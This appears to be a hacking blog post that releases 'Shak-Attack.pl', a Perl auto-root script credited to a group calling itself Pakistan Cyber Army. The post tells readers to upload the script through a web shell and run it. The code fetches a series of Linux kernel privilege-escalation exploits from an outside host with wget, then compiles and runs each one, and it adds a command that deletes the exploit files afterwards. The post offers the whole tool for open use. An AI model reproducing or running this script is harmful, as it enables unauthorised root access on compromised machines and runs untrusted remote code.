Shak-Attack.pl V.1 ( Auto R00t for Almost all Linux Latest Version ) By PCA



Shak-Attack.pl V.1 is a Linux root exploit designed By Shak from Pakistan Cyber Army (PCA) in Perl coding.According to Shak:- 

"...I found this useful in hacking , so i released my first auto root Perl exploit ,
i name this to Shak-attack.pl

Usage :-

save the below code in text document , and then save as to shak-attack.pl

upload it through shell , change the permission to 777 , and run it by using this command

perl shak-attack.pl

i have added some new Linux local root in it , will release the v2.0 version s00n ,
as I am working on other new Linux exploits , will add them as well ,

and also will add some other tools in this script !

this is a public version ! feel free to use it , if you have any error , let me know !

regards ,

<=Shak=>........"

Shak-Attack.pl V.1 Code:-

#!/usr/bin/perl 
############################################
#shak-attack.pl coded by <=Shak=>          #
#Site: http://pakcyberarmy.net/ 
#Contact : hax_you_anytime@live.com
#Thankx to : z3r0 c0de , Shadow008         #
############################################

if ($ARGV[0] =~ "root" ) 
{
system("wget http://pakcyberarmy.com/local/2.6.18.c");
system("gcc 2.6.18.c -o 2.6.18");
system("chmod 777 2.6.18");
system("./2.6.18");
system("id");
system("wget http://pakcyberarmy.com/local/2.6.33.c");
system("gcc 2.6.33.c -o 2.6.33");
system("chmod 777 2.6.33");
system("./2.6.33");
system("id");
system("wget http://pakcyberarmy.com/local/2.6.34.c");
system("gcc -w 2.6.34.c -o 2.6.34");
system("sudo setcap cap_sys_admin+ep 2.6.34");
system("./2.6.34");
system("id");
system("wget http://pakcyberarmy.com/local/2.6.37-rc2.c");
system("gcc 2.6.37-rc2.c -o 2.6.37-rc2");
system("chmod 777 2.6.37-rc2");
system("./2.6.37-rc2");
system("id");
system("wget http://pakcyberarmy.com/local/2.6.37.c");
system("gcc 2.6.37.c -o 2.6.37");
system("chmod 777 2.6.37");
system("./2.6.37");
system("id");
system("wget http://pakcyberarmy.com/local/2.6.43.2.c");
system("gcc -w 2.6.43.2.c -o 2.6.43.2");
system("sudo setcap cap_sys_admin+ep 2.6.43.2");
system("chmod 777 2.6.43.2");
system("./2.6.43.2");
system("id");
system("wget http://pakcyberarmy.com/local/3.0.c");
system("gcc 3.0.c -o 3.0");
system("chmod 777 3.0");
system("./3.0");
system("id");
}
if ($ARGV[0] =~ "del" )
{
print "All Exploit deleting ...\n";
system("rm 2.6*;rm -rf 2.6*;rm 3.0*;rm -rf 3.0*");

}

0 comments:

Post a Comment

Related Posts Plugin for WordPress, Blogger...